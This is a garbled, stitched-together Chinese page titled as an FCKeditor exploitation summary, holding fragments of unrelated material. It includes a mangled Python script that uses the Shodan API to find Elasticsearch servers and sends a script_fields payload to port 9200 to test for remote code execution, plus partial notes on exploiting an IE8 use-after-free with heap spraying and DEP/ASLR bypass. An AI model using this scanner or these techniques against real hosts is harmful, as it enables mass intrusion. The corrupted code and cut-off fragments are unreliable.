FCKeditor漏洞利用总结漏洞预警.docxVIP

FCKeditor漏洞利用总结漏洞预警

篇1：fckeditor漏洞利用漏洞预警query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/phpcheck.py需要安装shodan模块和shodanapi

#!/usr/bin/env?python#?-*-?coding:?utf-8?-*-#by?ha.cker@importtimeimportshodanimportsysimporturllibimportsimplejsonimportsocketprint******************************************************print*?Elasticsearch?vul?found?Tool???????????????????????*print*?Write?by?ha.cker@????????????????????????????*print*?U?can?use?shodan?api?to?search?the?vul?host????????*print******************************************************#?ConfigurationAPI_KEY?=”“#?apidefcheck(ip):ip=ip????socket.setdefaulttimeout(3)try:rs?=?urllib.urlopen(+%s%ip?+:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString%22}}}})rs?=?rs.read()rs?=?simplejson.loads(rs)except:passtry:fortinrs[hits][hits][0][fields][t]:t=texcept:passelse:printfound?vul?host?:?%s%?ipdefmain():try:#Setupthe?api????????????api?=?shodan.Shodan(API_KEY)query?=you?Know,?forforiinrange(1,100):page?=?itry:result?=?api.search(query,page)exceptException,e:printError:?%s?and?sleep?10?s%?e????????????????????time.sleep(10)passelse:forserviceinresult[matches]:ip?=?service[ip_str]ip=str(ip)check(ip)#Loopthrough?the?matchesandprinteach?IPexceptException,e:printError:?%s?and?sleep?10?s%?eprinti????????????sys.exit(1)if__name__?==__main__:main()篇12：CV漏洞利用学习笔记漏洞预警

前面一篇学习了下怎么用ClassName或者title来进行占位，现在学习下如何利用该漏洞

对于UAF漏洞的利用，最简洁的就是通过HeapSpary来实现了，国外的大神也提出了一种不用HeapSpary，直接构造一个对象来利用的方法

现在学习一下这两种方法，漏洞利用环境为win732位+ie8，我们需要解决的问题有：

1.假如精确进行HeapSpary

2.如何bypassDEP

3.解决ALSR

接下来一个个解决这3个问题：

一、如何精确进行HeapSpary

有关这个问题，泉哥翻译的Exploit编写系列教程有具体的说明，可以参考下，

这里首先说明为什么要进行精确的HeapSpary

由于在xpsp3之后，ie8默认就开启了DEP，这样使得直接进行HeapSpary喷射的内存将不具有可执行的属性，一旦EIP跳到我们喷射的内存上将由于不行执行属性而触发特别：

0:012g

(cbc.258):Accessviolation-codec0000005(firstchance)

Firstchanceexceptionsare